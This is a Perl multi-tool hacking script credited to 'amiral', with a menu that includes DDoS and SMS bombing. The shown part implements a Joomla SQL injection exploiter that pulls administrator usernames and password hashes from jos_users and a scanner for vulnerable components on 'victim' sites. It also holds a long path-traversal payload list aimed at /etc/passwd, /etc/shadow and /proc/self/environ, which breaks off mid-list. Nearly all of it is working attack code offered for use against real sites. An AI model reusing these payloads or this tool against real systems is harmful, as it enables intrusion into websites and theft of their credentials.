ALL SCRIPT fuck sécurité

1. #!/usr/bin/perl
2. use HTTP::Request;
3. use LWP::UserAgent;
4. use Digest::MD5;
5. use MIME::Base64;
6. use LWP::Simple;
7. use IO::Socket;
8. use HTTP::Request::Common;
9. use Term::ANSIColor;
10. use Win32::Console::ANSI;
11. system('cls');
12. system('title WhiteCodeX');
13. print color("green"),"======================================================\n";
14. print color("green")," blackCodeN \n";
15. print color("green")," [#] SEA | teama [#] \n";
16. print color("red"), " Coded by amiral \n";
17. print color("green"), "======================================================\n";
18. print color("green"),"[1] Shell Finder\n";
19. print color("green"),"[2] Admin Finder\n";
20. print color("green"), "[3] Dorker Bing\n";
21. print color("green"), "[4] Lfi Rfi Xss Scanner\n";
22. print color("green"), "[5] Joomla Component Scanner\n";
23. print color("green"), "[6] SMS Bomber\n";
24. print color("green"), "[7] Proxy Grabber\n";
25. print color("green"), "[8] Wordpress Plugin Checker\n";
26. print color("green"), "[9] Jce Server Scanner\n";
27. print color("green"), "[10] Md5 Cracker Online\n";
28. print color("green"), "[11] FckEditor Dir Tester\n";
29. print color("green"), "[12] Sqli Scanner\n";
30. print color("green"), "[13] Wordpress Site Finder\n";
31. print color("green"), "[14] Wordpress BruteFoce\n";
32. print color("green"), "[15] Joomla Sql Injection Tester\n";
33. print color("green"), "[16] DDOS\n";
34. print color("green"), "[17] Reverse IP\n";
35. print color("green"), "[1x] About Me\n\n";
36. print "[+] Choose Number : ";
37. my $targett = <>;
38. chomp $targett;
39. if($targett eq '15')
40. {
41. system('cls');
42. system('title Joomla Sqli Injection Tester');
43. use LWP::Simple;
44. use LWP::UserAgent;
45. use HTTP::Cookies;
46. use POSIX qw(strftime);
47. use Win32::Console::ANSI;
48. use Term::ANSIColor qw(:constants);
49.  
50. if($^O =~ /Win/){
51. system("cls");
52. }else{
53. system("clear");
54. }
55. my $date = localtime();
56. my ($sec,$min,$hour,$day,$mon,$year,$wday,$yday,$isdst)=localtime(time);
57. print RED, q {
58. .___ .___ .__
59. | | ____ __| _/____ ____ ____ _____|__|____
60. | |/ \ / __ |/ _ \ / \_/ __ \ / ___/ \__ \
61. | | | \/ /_/ ( <_> ) | \ ___/ \___ \| |/ __ \_
62. |___|___| /\____ |\____/|___| /\___ >____ >__(____ /
63. \/ \/ \/ \/ \/ \/
64. };
65. print RESET;
66.  
67. $target = $ARGV[0];
68. #Daftar vulnnya bisa ditambahin sendiri mas
69. @vuln = (
70. "/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1",
71. "/index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=-24",
72. "/index.php?option=com_virtuemart&view=user&task=removeAddressST&virtuemart_userinfo_id=-16",
73. "/index.php?option=com_jvideoclip&view=search&type=user&uid=-1",
74. "/index.php?option=com_mamml&listid=-1",
75. "/index.php?option=com_fq&Itemid=3&listid=-9999999",
76. "/index.php?option=com_listing&task=browse&category_id=-1",
77. "/index.php?option=com_techfolio&view=techfoliodetail&catid=-1",
78. "/index.php?option=com_tupinambis&task=verproyecto&proyecto=-1",
79. "/index.php?option=com_tupinambis&task=verproyecto&proyecto=-1",
80. "/index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=2&cat_id=-1",
81. "/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-1",
82. "/index.php?option=com_clasifier&Itemid=1&cat_id=-1",
83. "/index.php?option=com_jooget&Itemid=2&task=detail&id=-1",
84. "/index.php?option=com_galeria&Itemid=7&func=detail&id=-1",
85. "/index.php?option=com_paxxgallery&Itemid=85&gid=7&userid=1&task=view&iid=-1",
86. "/index.php?option=com_mcquiz&task=user_tst_shw&Itemid=1&tid=-1",
87. "/index.php?option=com_quiz&task=user_tst_shw&Itemid=1&tid=-1",
88. "/index.php?option=com_xfaq&task=answer&Itemid=1&catid=97&aid=-1",
89. "/index.php?option=com_gallery&Itemid=0&func=detail&id=-1",
90. "/index.php?option=com_rapidrecipe&page=showuser&user_id==1",
91. "/index.php?option=com_downloads&Itemid=10&func=selectfolder&filecatid=-1",
92. "/index.php?option=com_shambo2&Itemid=-1",
93. "/index.php?option=com_neoreferences&Itemid=27&catid=-1",
94. "/index.php?option=com_akogallery&Itemid=11&func=detail&id=-1",
95. "/index.php?option=com_catalogshop&Itemid=13&func=detail&id=-1",
96. "/index.php?option=com_restaurant&Itemid=10&func=detail&id=-1",
97. "/index.php?option=com_musepoes&task=answer&Itemid=1&catid=2&aid=-1",
98. "/index.php?option=com_recipes&Itemid=2&func=detail&id=-1",
99. "/index.php?option=com_jokes&Itemid=1&func=CatView&cat=-1",
100. "/index.php?option=com_estateagent&Itemid=21&func=showObject&info=contact&objid=-1",
101. "/index.php?option=com_newsletter&Itemid=1&listid=-9999999"
102. );
103. #Hapus aja pagernya kalo mau dipake semua
104. @sqli = ('+union+all+select+1,concat_ws(0x3a,usertype,username,password),3,4,5,6,7,8,9+from+jos_users'
105. #,'/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*'
106. #,'/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username/**/from/**/jos)users/*'
107. #,'/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*'
108. #,'/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/jos_users/*'
109. #,'+union+select+1,2,3,concat_ws(0x3a,username,password)indonesia,5,6,7,8,9,10,11+from+mos_users--'
110. #,'+union+select+1,2,3,concat_ws(0x3a,username,password)indonesia,5,6,7,8,9,10,11+from+jos_users--'
111. );
112. print GREEN, q(
113. Joomla SQLi Exploiter
114. Contact me at : amiralbenz<at>gmail.com
115. SEA People Here!!
116. );
117. chomp $target;
118.  
119. print "[+] Enter Joomla Site: ";
120. chomp ($target = <STDIN>);
121. print RESET;
122. print YELLOW, "-----------------------------------------------------------------------------------------------
123. [!] Atacking info
124. -----------------------------------------------------------------------------------------------
125. [!] Target : $target
126. [!] Method : SQL injection
127. [!] Started : $hour:$min:$sec\n";
128. print "-----------------------------------------------------------------------------------------------
129. [!] Exploiting $target...
130. [!] Please wait cuwk!\n";
131. print RESET;
132. foreach $vuln(@vuln){
133. foreach $sqli(@sqli){
134. $expl = "http://" . $target . $vuln . $sqli;
135. $req = HTTP::Request->new(GET=>$expl);
136. $ua = LWP::UserAgent->new(keep_alive => 1);
137. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12");
138. $ua->timeout (10);
139. $ua->cookie_jar(
140. HTTP::Cookies->new(
141. file => 'cookies.txt',
142. autosave => 1
143. )
144. );
145. $res = $ua->request($req);
146. if ($res->is_success) {
147. $res = $res->content;
148. if ($res =~ /Administrator:(.*):(.*)/) {
149. #if ($res =~ m/:/g) {
150. ($user) = ($1);
151. my ($sec,$min,$hour)=localtime();
152. print "-----------------------------------------------------------------------------------------------";
153. print GREEN, "
154. [$hour:$min:$sec]
155. [+] Exploit Succes !";
156. print ON_BLUE, GREEN, "
157. [+] $user\n";
158. printlog ("
159. Joomla SQLi Log
160. Date : $date
161. Target : $expl
162. Exploit : $user\n
163. ");
164. print RESET;
165. print YELLOW, "-----------------------------------------------------------------------------------------------\n";
166. print RESET;
167. exit;
168. }
169. }
170. }}
171. print YELLOW, "-----------------------------------------------------------------------------------------------\n";
172. print RESET;
173. my ($sec,$min,$hour)=localtime();
174. print BLUE, "[$hour:$min:$sec]
175. [-] Exploit SQLi at $target failed! \n";
176. print RESET;
177. print YELLOW, "-----------------------------------------------------------------------------------------------\n";
178.  
179. sub printlog
180. {
181. my ($logsec,$logmin,$loghour,$logmday,$logmon,$logyear,$logwday,$logyday,$logisdst)=localtime(time);
182. my $logtimestamp = sprintf("%4d-%02d-%02d,%02d:%02d:%02d",$logyear+1900,$logmon+1,$logmday,$loghour,$logmin,$logsec);
183. $logmon++;
184. $logyear=$logyear+1900;
185. my $log="[$logdir$logyear-$logmon-$logmday]SQLi.log";
186. open(lo,">>$log") or die "$log:$!";
187. print lo @_[0];
188. close(lo);
189. return;
190. }}
191. if($targett eq '5')
192. {
193. system('cls');
194. system('title Joomla Component Scanner');
195. package control;
196. use HTTP::Request;
197. use LWP::UserAgent;
198.  
199. system('cls');
200. system(' Title Files and Directory Scanner ');
201. system "color a";
202. print"\n";
203. print "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
204. print "\t> Joomla Component Scanner >\n";
205. print "\t> >\n";
206. print "\t> Coded by amiral >\n";
207. print "\t> benz Team | amiral >\n";
208. print "\t> Result In com.txt >\n";
209. print "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
210. print "\n";
211.  
212. print " Scan Your site Site\n\n Example: www.victim.com \n\n-> ";
213.  
214.  
215. $site=<STDIN>;
216. chomp $site;
217.  
218. if($site !~ /http:\/\//) { $site = "http://$site/"; };
219.  
220. print "\n";
221. @path = ('/components/com_tag',
222. '/components/com_virtuemart',
223. '/components/com_jvehicles',
224. '/components/com_s5clanroster',
225. '/components/com_fireboard',
226. '/components/com_fabrik',
227. '/components/com_jinc',
228. '/components/com_xcloner-backupandrestore',
229. '/components/com_dshop',
230. '/components/com_ponygallery',
231. '/components/com_bearleague',
232. '/components/com_obsuggest',
233. '/components/com_alameda',
234. '/components/com_estateagent',
235. '/components/com_collector',
236. '/components/com_qcontacts',
237. '/components/com_niceajaxpoll',
238. '/components/com_xmap',
239. '/components/com_team',
240. '/components/com_joomnik',
241. '/components/com_question',
242. '/components/com_jmsfileseller',
243. '/components/com_rsfiles',
244. '/components/com_versioning',
245. '/components/com_hello',
246. '/components/com_calcbuilder',
247. '/components/com_jmsfileseller',
248. '/components/com_xmovie',
249. '/components/com_people',
250. '/components/com_idoblog',
251. '/components/com_adsmanager',
252. '/components/com_xgallery',
253. '/components/com_alfurqan15x',
254. '/components/com_alfurqan',
255. '/components/com_billyportfolio',
256. '/components/com_jimtawl',
257. '/components/com_content',
258. '/components/com_jfuploader',
259. '/components/com_kunena',
260. '/components/com_jooproperty',
261. '/components/com_jsupport',
262. '/components/com_markt',
263. '/components/com_img',
264. '/components/com_clanlist',
265. '/components/com_clan',
266. '/components/com_ckforms',
267. '/components/com_dcnews',
268. '/components/com_connect',
269. '/components/com_rsappt_pro2',
270. '/components/com_techfolio',
271. '/components/com_zcalendar',
272. '/components/com_tpjobs',
273. '/components/com_simpleshop',
274. '/components/com_sef',
275. '/components/com_searchlog',
276. '/components/com_contact',
277. '/components/com_enmasse',
278. '/components/com_elite_experts',
279. '/components/com_ezautos',
280. '/components/com_jgen',
281. '/components/com_jphone',
282. '/components/com_mosets',
283. '/components/com_jefaqpro',
284. '/components/com_picsell',
285. '/components/com_ongallery',
286. '/components/com_equipment',
287. '/components/com_zoomportfolio',
288. '/components/com_amblog',
289. '/components/com_joltcard',
290. '/components/com_jp_jobs',
291. '/components/com_bfquiztrial',
292. '/components/com_qpersonel',
293. '/components/com_pandafminigames',
294. '/components/com_golfcourseguid',
295. '/components/com_jejob',
296. '/components/com_jeajaxeventcalendar',
297. '/components/com_jradio',
298. '/components/com_spidercatalog',
299. '/components/com_/components/commedia',
300. '/components/com_fss',
301. '/components/com_icagenda',
302. '/components/com_spidercalendar',
303. '/components/com_joomgalaxy',
304. '/components/com_ornekek',
305. '/components/com_weblinks',
306. '/components/com_rokmodule',
307. '/components/com_discussions',
308. '/components/com_hm/components/community',
309. '/components/com_eslamiat',
310. '/components/com_listing',
311. '/components/com_jeemasms',
312. '/components/com_yjcontactus',
313. '/components/com_timereturns',
314. '/components/com_jce',
315. '/components/com_joomtouch',
316. '/components/com_jdirectory',
317. '/components/com_jesubmit',
318. '/components/com_sobi2',
319. '/components/com_acooldebate',
320. '/components/com_booklibrary',
321. '/components/com_acymailing',
322. '/components/com_doqment',
323. '/components/com_allcinevid',
324. '/components/com_jotloader',
325. '/components/com_jeauto',
326. '/components/com_ccboard',
327. '/components/com_ccinvoices',
328. '/components/com_flipwall',
329. '/components/com_sponsorwall',
330. '/components/com_cbe',
331. '/components/com_jscalendar',
332. '/components/com_restaurantguide',
333. '/components/com_nkc',
334. '/components/com_aardvertiser',
335. '/components/com_clantools',
336. '/components/com_remository',
337. '/components/com_dateconverter',
338. '/components/com_wmtpic',
339. '/components/com_donateprocess',
340. '/components/com_gamesbox',
341. '/components/com_jcafe',
342. '/components/com_awd_song',
343. '/components/com_picasa2gallery',
344. '/components/com_ybggal',
345. '/components/com_joomdocs',
346. '/components/com_answers',
347. '/components/com_galleryxml',
348. '/components/com_oziogallery2',
349. '/components/com_listbingo',
350. '/components/com_easygb',
351. '/components/com_jtickets',
352. '/components/com_jesectionfinder',
353. '/components/com_realtyna',
354. '/components/com_/components/community',
355. '/components/com_jomestate',
356. '/components/com_jtickets',
357. '/components/com_cinema',
358. '/components/com_jstore',
359. '/components/com_annonces',
360. '/components/com_lead',
361. '/components/com_sar_news',
362. '/components/com_chronocontact',
363. '/components/com_chronoconnectivity',
364. '/components/com_djartgallery',
365. '/components/com_quran',
366. '/components/com_g2bridge',
367. '/components/com_reservations',
368. '/components/com_jepoll',
369. '/components/com_mycar',
370. '/components/com_mediqna',
371. '/components/com_zelig',
372. '/components/com_bookmarks',
373. '/components/com_hotproperty',
374. '/components/com_jombib',
375. '/components/com_store',
376. '/components/com_mosforms',
377. '/components/com_/components/comprofiler',
378. '/components/com_crowdsource',
379. '/components/com_camp',
380. '/components/com_ms/components/comment',
381. '/components/com_extcalendar',
382. '/components/com_imoti',
383. '/components/com_product',
384. '/components/com_event',
385. '/components/com_simpledownload',
386. '/components/com_news',
387. '/components/com_article',
388. '/components/com_jequoteform',
389. '/components/com_konsultasi',
390. '/components/com_sebercart',
391. '/components/com_php',
392. '/components/com_jinc',
393. '/components/com_mytube',
394. '/components/com_jbudgetsmagic',
395. '/components/com_surveymanager',
396. '/components/com_jreservation',
397. '/components/com_foobla_suggestions',
398. '/components/com_djcatalog',
399. '/components/com_turtushout',
400. '/components/com_alphauserpoints',
401. '/components/com_lucygames',
402. '/components/com_bfsurvey_profree',
403. '/components/com_tpdugg',
404. '/components/com_joomloc',
405. '/components/com_joomlub',
406. '/components/com_artportal',
407. '/components/com_agora',
408. '/components/com_gameserver',
409. '/components/com_digifolio',
410. '/components/com_bca-rss-syndicator',
411. '/components/com_expose',
412. '/components/com_equotes',
413. '/components/com_media',
414. '/components/com_misterestate',
415. '/components/com_wrapper',
416. '/components/com_mailto',
417. '/components/com_autartimonial',
418. '/components/com_artforms',
419. '/components/com_redshop',
420. '/components/com_staticxt',
421. '/components/com_spa',
422. '/components/com_jomtube',
423. '/components/com_golfcourseguide',
424. '/components/com_huruhelpdesk',
425. '/components/com_joomdle',
426. '/components/com_youtube',
427. '/components/com_joomla-visites',
428. '/components/com_ttvideo',
429. '/components/com_appointinator',
430. '/components/com_photomapgallery',
431. '/components/com_spielothek',
432. '/components/com_pbbooking',
433. '/components/com_beamospetition',
434. '/components/com_neorecruit',
435. '/components/com_cgtestimonial',
436. '/components/com_jgrid',
437. '/components/com_zina',
438. '/components/com_pro_desk',
439. '/components/com_user',
440. '/components/com_k2',
441. '/components/com_rsbook_15',
442. '/components/com_gk3_photoslide',
443. '/components/com_jvideodirect',
444. '/components/com_jcalpro',
445. '/components/com_banners',
446. '/components/com_datsogallery',
447. '/components/com_joomradio',
448. '/components/com_jfbconnect',
449. '/components/com_myblog',
450. '/components/com_phocamaps',
451. '/components/com_contact_enhanced',
452. '/components/com_aicontactsafe',
453. '/components/com_poll',);
454.  
455.  
456. foreach $com(@path){
457.  
458. $url = $site.$com;
459. $req = HTTP::Request->new(GET=>$url);
460. $useragent = LWP::UserAgent->new();
461.  
462. $response = $useragent->request($req);
463.  
464. if ($response->is_success){
465. print "$com\n";
466. $url = substr($url, $com + 13);
467. $com = substr($url, 0, index($url, '"'));
468. open (txt,">>com.txt");
469. print txt $com,"\n";
470. close(txt);
471. print "=> Dir Found : $url\n";
472. }
473. else {
474. print "=> Not Found : $com\n";
475. }}
476. }
477.  
478. if($targett eq '4')
479. {
480. system('cls');
481. system('title Lfi Rfi Xss Scanner');
482. {
483. use LWP::Simple;
484. system(($^O eq 'MSWin32') ? 'cls' : 'clear');
485. print "#############################################################";
486. print "\n\t\t WhiteCodeX Scanner [XSS - LFI - RFI]";
487. print "\n\t\t <<< amiral | benz >>>";
488. print "\n\t\t ReCode By MrTieDie";
489. sleep (1);
490. print "\n\n\t\t blackCode Menu ";
491. print "\n \t\t 1- XSS SCAN ";
492. print "\n \t\t 2- LFI SCAN ";
493. print "\n \t\t 3- RFI SCAN (FOR JOOMLA) ";
494. print "\n \t\t 4- XSS & LFI ";
495. print "\n\n \t\t 5- Exit\n";
496. print "\n Choose :";
497. $ID =<STDIN>;
498. ######
499. @LFI =("/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","....//etc/passwd","....//....//etc/passwd","....//....//....//etc/passwd","....//....//....//....//etc/passwd","....//....//....//....//....//etc/passwd","....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//....//....//etc/passwd","....//etc/passwd%00","....//....//etc/passwd%00","....//....//....//etc/passwd%00","....//....//....//....//etc/passwd%00","....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//....//....//....//etc/passwd%00","%2Fetc%2Fpasswd","..%2Fetc%2Fpasswd","..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","%2Fetc%2Fpasswd%00","..%2Fetc%2Fpasswd%00","..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","....%2f%2Fetc/passwd","....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","/proc/self/environ","../proc/self/environ","../../proc/self/environ","../../../proc/self/environ","../../../../proc/self/environ","../../../../../proc/self/environ","../../../../../../proc/self/environ","../../../../../../../proc/self/environ","../../../../../../../../proc/self/environ","../../../../../../../../../proc/self/environ","../../../../../../../../../../proc/self/environ","/proc/self/environ%00","../proc/self/environ%00","../../proc/self/environ%00","../../../proc/self/environ%00","../../../../proc/self/environ%00","../../../../../proc/self/environ%00","../../../../../../proc/self/environ%00","../../../../../../../proc/self/environ%00","../../../../../../../../proc/self/environ%00","../../../../../../../../../proc/self/environ%00","../../../../../../../../../../proc/self/environ%00","%2Fproc%2Fself%2Fenviron","..%2Fproc%2Fself%2Fenviron","..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","%2Fproc%2Fself%2Fenviron%00","..%2Fproc%2Fself%2Fenviron%00","..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","//proc/self/environ","....//proc/self/environ","....//....//proc/self/environ","....//....//....//proc/self/environ","....//....//....//....//proc/self/environ","....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//....//....//....//proc/self/environ","//proc/self/environ%00","....//proc/self/environ%00","....//....//proc/self/environ%00","....//....//....//proc/self/environ%00","....//....//....//....//proc/self/environ%00","....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//....//....//....//proc/self/environ%00","%2f%2Fproc/self/environ","....%2f%2Fproc/self/environ","....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","%2f%2Fproc/self/environ%00","....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","/etc/shadow","../etc/shadow","../../etc/shadow","../../../etc/shadow","../../../../etc/shadow","../../../../../etc/shadow","../../../../../../etc/shadow","../../../../../../../etc/shadow","../../../../../../../../etc/shadow","../../../../../../../../../etc/shadow","../../../../../../../../../../etc/shadow","/etc/shadow%00","../etc/shadow%00","../../etc/shadow%00","../../../etc/shadow%00","../../../../etc/shadow%00","../../../../../etc/shadow%00","../../../../../../etc/shadow%00","../../../../../../../etc/shadow%00","../../../../../../../../etc/shadow%00","../../../../../../../../../etc/shadow%00","../../../../../../../../../../etc/shadow%00","%2Fetc..%2Fshadow","..%2Fetc%2Fshadow","..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","%2Fetc..%2Fshadow%00","..%2Fetc%2Fshadow%00","..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","%2F%2Fetc/shadow","....%2f%2Fetc/shadow","....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","%2F%2Fetc/sha